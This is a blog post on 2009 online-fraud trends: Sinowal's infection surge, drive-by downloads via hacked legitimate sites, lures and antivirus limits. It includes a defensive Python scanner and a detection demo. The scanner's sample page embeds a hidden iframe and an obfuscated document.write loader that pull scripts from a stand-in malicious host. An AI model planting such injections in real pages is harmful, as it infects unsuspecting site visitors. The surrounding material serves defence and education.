
Good Times in Fraudland: Part II

In the first of my three entries summarizing 2009 online fraud trends, I suggested that there had never been a better time to be a cybercriminal, and talked about the high-grade Trojans currently available to fraudsters. But to use a modern warfare analogy, even if you have nuclear weapons they aren’t really effective without a robust ballistic missile program to deliver the payload to the designated targets. And to use the more classic virus analogy, it takes a very effective infection mechanism to turn a lethal virus strain into a global pandemic.

Wildfire Infection

The RSA FraudAction lab exposed the infrastructure of the notorious Sinowal Trojan, also known as Torpig or Mebroot, in October 2008. Sinowal isn’t a Trojan kit and you cannot buy it anywhere: it’s a syndicated organized crime ring based in Eastern Europe that spans several continents, and for the past four years its virtual silhouette has been glued to every eCrime researcher’s billboard, complete with a “most wanted” sign.

The first thing that caught the team’s attention was the sheer magnitude of the stolen data: there were almost 300,000 compromised PCs, each tapped for one set of online banking credentials and one credit card on average. The other amazing fact was that the server had been live since 2006 despite numerous attempts to shut it down; it had a highly resilient framework and good disaster recovery backups.

When the Sinowal data was analyzed, an amazing fact stood out: the pace of infection increased tenfold in summer 2008. If March had 2,500 new computers infected with Sinowal, the rate in September jumped to 25,000.

What caused this massive surge of infection? The immediate suspect was the code itself: perhaps the fraudsters had managed to make the Trojan horse a lot stealthier. But as the team dug deeper they realized nothing in the code would explain this massive boost in distribution. No, there had to be another explanation.

The explanation was soon found: drive-by download.

Here’s a good example of drive-by download. Try this now: go to and click on the news section on the left. Go down the archive of articles on the right to May 2009, and find the post from 01.05.2009 titled “website security statement”. Read it… Or if you’re too lazy, here’s an earlier account I posted about the incident.

Summer 2008 marked the beginning of an onslaught of drive-by download attacks, which spread like wildfire through a highly advanced SQL injection botnet, beefed up by other hacking methods such as taking over websites’ FTP service after stealing the administrator passwords.

The interesting thing about drive-by download attacks is that the infection takes place on a perfectly legitimate website with a healthy traffic of perfectly legitimate users. It’s important to note that the only pre-condition is browsing the website: no other user action is needed. Infection is absolutely automatic, and happens as long as the PC isn’t completely patched against the latest security vulnerabilities. Most users do not bother to update their browser version, operating system and internet tools such as Acrobat Reader or Flash; when a program pops up and offers an upgrade, many click on “remind me later”. It’s a bit like getting a knock on your door, and finding a team of doctors bringing you a Swine Flu vaccine. “Not now, remind me later” isn’t what you’re supposed to say.
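The compromised-site side of what the two paragraphs above describe is usually visible in the page source: the SQL injection botnet or stolen FTP credentials were used to append a hidden iframe or an obfuscated script tag that pulls the exploit from a third-party host. The scanner below is an added example, not code from the original post or from RSA; the trusted-host allowlist, the detection rules and the two sample pages are constructed assumptions, intended to show a site owner what such an injection looks like when reviewing their own pages after an incident.

```python
"""
Scan HTML for the markers of a drive-by-download injection.

Added example (not from the original post). TRUSTED_HOSTS, the rules
and the sample pages are assumptions constructed for the demonstration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately loads scripts and frames from (assumed).
TRUSTED_HOSTS = {"www.example-bank.test", "cdn.example-bank.test"}


class InjectionScanner(HTMLParser):
    """Collects findings for tags that commonly carry injected redirects."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted_hosts = trusted_hosts
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self._check_iframe(a)
        elif tag == "script":
            self._in_script = True
            src = a.get("src")
            if src and not self._is_trusted(src):
                self.findings.append(f"script from untrusted host: {src}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Inline script bodies: injected loaders often hide the target URL
        # behind unescape()/document.write() with percent-encoded characters.
        if self._in_script and re.search(r"(unescape|document\.write)\s*\(", data) \
                and re.search(r"%[0-9a-fA-F]{2}", data):
            self.findings.append("obfuscated inline script (escaped document.write)")

    def _is_trusted(self, url):
        host = urlparse(url).hostname
        # A relative URL has no host and stays on the site itself.
        return host is None or host in self.trusted_hosts

    def _check_iframe(self, a):
        src = a.get("src") or ""
        style = (a.get("style") or "").replace(" ", "").lower()
        zero_size = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
        hidden = "display:none" in style or "visibility:hidden" in style
        if not self._is_trusted(src) and (zero_size or hidden):
            self.findings.append(f"hidden iframe to untrusted host: {src}")


def scan_html(html, trusted_hosts=TRUSTED_HOSTS):
    """Return the list of findings for one page (an empty list means clean)."""
    p = InjectionScanner(trusted_hosts)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample pages: a clean page, and the same page with an
# injection appended the way a database or FTP compromise would leave it.
CLEAN_PAGE = """<html><body>
<h1>News</h1><p>Website security statement.</p>
<script src="/js/site.js"></script>
<iframe src="https://cdn.example-bank.test/widget" width="300" height="200"></iframe>
</body></html>"""

INJECTED_PAGE = CLEAN_PAGE + """
<iframe src="http://malicious-host.invalid/in.cgi?3" width="0" height="0" style="display: none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://malicious-host.invalid/x.js%22%3E%3C/script%3E'))</script>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_html(page) or "no findings")
```

The allowlist is what makes the check useful: a zero-size iframe or an escaped `document.write` is only suspicious when it points somewhere the site does not normally load content from, and the scanner is meant to be run over every page (or every text column of the database) rather than on a single file.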

Right now there are thousands of legitimate websites hacked in order to lead their traffic to infection servers. Not all of them are as visited as Paul McCartney or Paris Hilton fan sites, but some are. Websense reported in mid 2009 a 671% increase in the number of legitimate websites hijacked for spreading malware compared to the previous year, and Panda Labs estimated that over 10 million PCs have already been infected with a financial Trojan. That was a year ago; today the numbers should be in the dozens of millions. And the amazing thing is: people still know nothing about drive-by download.

If you keep your PC security fully up to date you stand a good chance against automatic drive-by download infection, but you can still get infected by downloading an executable file. Here the main advice is: use common sense.

Cybercriminals are aware of this pesky thing called common sense, and develop social engineering methods designed to befuddle your judgment. The preferred vehicle these days is Web 2.0 applications – which fraudsters simply adore – and in particular social networks. If you’re logged into the social network and notice an invitation from a friend to watch a cool video, but when you get to the page the video doesn’t work and the site advises downloading the latest video converter, and after you click on the link a helpful gray box pops up and asks your permission to install the friendly program, don’t click on Run. Because if you do, you’ll be the latest unlucky member of a botnet, and will soon have your PC swarming with Trojans.

Other infection methods include getting an email with an exciting piece of news such as Michael Jackson is Dead! or Ceasefire in Gaza! Here the attack starts with a message delivered via email or social media, with a link leading to an infection site. The same applies to fake Christmas cards or other digital greetings. P2P networks are a great source of infection via compromised files. Then there are SEO (search engine optimization) tricks deployed by cybercriminals to lead users searching for certain items of interest into the open jaws of a malware server or a fake antivirus.

Speaking of antivirus, it’s important to understand that today’s antivirus technologies find it difficult to keep up with malicious Trojans. Heuristics work well for certain Trojan families but not for all, and the main tool for identifying crimeware remains the virus signature. However, Trojan kits such as Zeus allow you to build new variants on the fly, so by the time the AV company has an up-to-date signature, victims are already downloading the new, untraceable code. Cisco published research showing that only 40% of Trojans released to the web get detected by over half of the leading AVs; Trusteer reported that fully up-to-date AVs were successful in detecting Zeus only 23% of the time, and that 55% of the PCs running Zeus had a fully up-to-date AV.

AV companies responded by developing community-based threat reporting, cloud-based protection or reputation-based security. These directions pose new challenges for Trojan builders, but it will take time to see the impact on the upward trend in infection.
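The two paragraphs above make a point that is easy to see in code: an exact signature matches only the bytes it was written for, so a kit that rebuilds the binary with a fresh configuration produces a file no signature knows, and the responses the post lists (heuristics, cloud or community reputation) have to judge the file on something other than its hash. The script below is an added example, not code from the original post, from any AV vendor or from Cisco or Trusteer; the two "builds", the benign file, the similarity threshold and the sighting counts are all constructed assumptions.

```python
"""
Exact signature vs. a rebuilt variant, and two of the responses the post
mentions: a structural heuristic and prevalence-based reputation.

Added example (not from the original post). The samples, thresholds and
sighting data below are constructed for the demonstration.
"""
import datetime as dt
import hashlib


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def signature_match(sample: bytes, known_hashes: set) -> bool:
    """Classic blocklist: matches only a byte-identical file."""
    return sha256(sample) in known_hashes


def ngrams(data: bytes, n: int = 4) -> set:
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def similarity(a: bytes, b: bytes, n: int = 4) -> float:
    """Jaccard similarity of byte n-gram sets: a crude structural heuristic
    that still scores a rebuilt sample against the family it came from."""
    ga, gb = ngrams(a, n), ngrams(b, n)
    return len(ga & gb) / len(ga | gb)


def heuristic_match(sample: bytes, family_samples, threshold: float = 0.6) -> bool:
    return any(similarity(sample, s) >= threshold for s in family_samples)


def reputation_verdict(file_hash, sightings, now, min_hosts=50, min_age_hours=24):
    """Cloud/community reputation: a file seen on only a few hosts and only
    recently has no track record, so it is treated as suspicious whether or
    not a signature exists. `sightings` maps hash -> (host_count, first_seen)."""
    if file_hash not in sightings:
        return "unknown"
    hosts, first_seen = sightings[file_hash]
    if hosts < min_hosts and now - first_seen < dt.timedelta(hours=min_age_hours):
        return "suspicious"
    return "established"


# Constructed samples: the same "code body" with two different configurations,
# standing in for two builds of one kit. Real builds differ far more, which
# only widens the gap an exact signature leaves.
STUB = b"MZ-stub:" + bytes(range(256)) * 4
KNOWN_BUILD = STUB + b"cfg:server=one.invalid;id=0001;"
NEW_BUILD = STUB + b"cfg:server=two.invalid;id=7342;"
BENIGN = b"plain text document " * 50

KNOWN_HASHES = {sha256(KNOWN_BUILD)}          # the signature the AV shipped
NOW = dt.datetime(2009, 10, 1, 12, 0)          # fixed clock for the example
SIGHTINGS = {                                  # constructed community telemetry
    sha256(KNOWN_BUILD): (12000, NOW - dt.timedelta(days=90)),
    sha256(NEW_BUILD): (3, NOW - dt.timedelta(hours=2)),
}


def assess(sample: bytes) -> dict:
    """Run all three checks on one file and return the verdicts."""
    return {
        "signature": signature_match(sample, KNOWN_HASHES),
        "heuristic": heuristic_match(sample, [KNOWN_BUILD]),
        "reputation": reputation_verdict(sha256(sample), SIGHTINGS, NOW),
    }


if __name__ == "__main__":
    for name, sample in (("known build", KNOWN_BUILD), ("new build", NEW_BUILD), ("benign", BENIGN)):
        print(name, assess(sample), f"similarity={similarity(sample, KNOWN_BUILD):.2f}")
```

The new build fails the signature check but is caught by both the similarity heuristic and the reputation rule; the benign text file passes all three. The reputation rule is the one that needs no prior knowledge of the family at all, which is why the post describes it as a new challenge for Trojan builders, and also why it produces false positives on legitimately rare software unless it is combined with the other checks.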

To summarize, things have changed dramatically in the past year when it comes to infection. The rate of infection today is 10 times higher than last year; rather than the Internet becoming a better place, things are actually getting worse. No longer should people worry just about files sent through email; today they can catch something by browsing a legitimate website or clicking on links to see fake videos.

Many people ask me “so what do YOU do to protect yourself?” – and my answer is: I use common sense and never download any applications unless I initiated the download myself; I enable automatic updates of the operating system and every Internet tool I use. Oh, and I never use my wife’s computer to access online banking or shop online. God knows what kind of stuff she downloads ;)

Uri Rivner

CEO and Co-Founder

Refine Intelligence
This post is from a series of posts in the group:

Innovation in Financial Services

A discussion of trends in innovation management within financial institutions, and the key processes, technology and cultural shifts driving innovation.